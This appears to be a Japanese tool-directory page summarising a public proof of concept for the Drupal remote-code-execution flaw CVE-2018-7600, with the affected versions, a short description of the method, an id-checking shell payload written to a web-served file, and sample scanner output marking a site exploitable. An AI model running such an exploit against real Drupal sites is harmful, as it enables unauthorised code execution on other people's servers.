Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-7600 — Drupal CVE-2018-7600 / SA-CORE-2018-002 の概念実証 | Kitploit
ツール/GitHubGitHub/thehappydinoa/cve-2018-7600
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発Archived
GitHubthehappydinoa/cve-2018-7600

CVE-2018-7600

Drupal CVE-2018-7600 / SA-CORE-2018-002 の概念実証

リポジトリを見る
713年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Proof-Of-Concept for CVE-2018-7600 / SA-CORE-2018-002 codebeat badge

Drupal 7.58未満、8.x 8.3.9未満、8.4.x 8.4.6未満、8.5.x 8.5.1未満のバージョンでは、デフォルトまたは一般的なモジュール構成の複数のサブシステムに影響する問題により、リモート攻撃者が任意のコードを実行できる可能性があります。

動作の仕組み

  1. drupal_ajax ラッパーにパケットを送信してユーザーを登録します。ユーザーが exec マークアップを使用してbashを実行できるようにします。このPoCは、ユーザー名とIDを abcde.txt に送信します。

    echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
    
  2. http*://example.com/abcde.txt を確認します

    [!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
    [?] Enter file name (example: /root/file/hosts.txt): hosts.txt
    [+] https://example.com/ Possibly exploitable
    [~] Checking... https://example.com/abcde.text
    [+] https://example.com/ Exploitable
    [+] UID: 33 Name: www-data
    [+] Deleting... https://example.com/abcde.text
    

ペイロード

%s = ファイル名

ユーザーID、PID、グループペイロード

echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s

謝辞

  • Vitalii Rudnykh に感謝

教育または情報提供のみを目的として提供されています。

ツールをダウンロード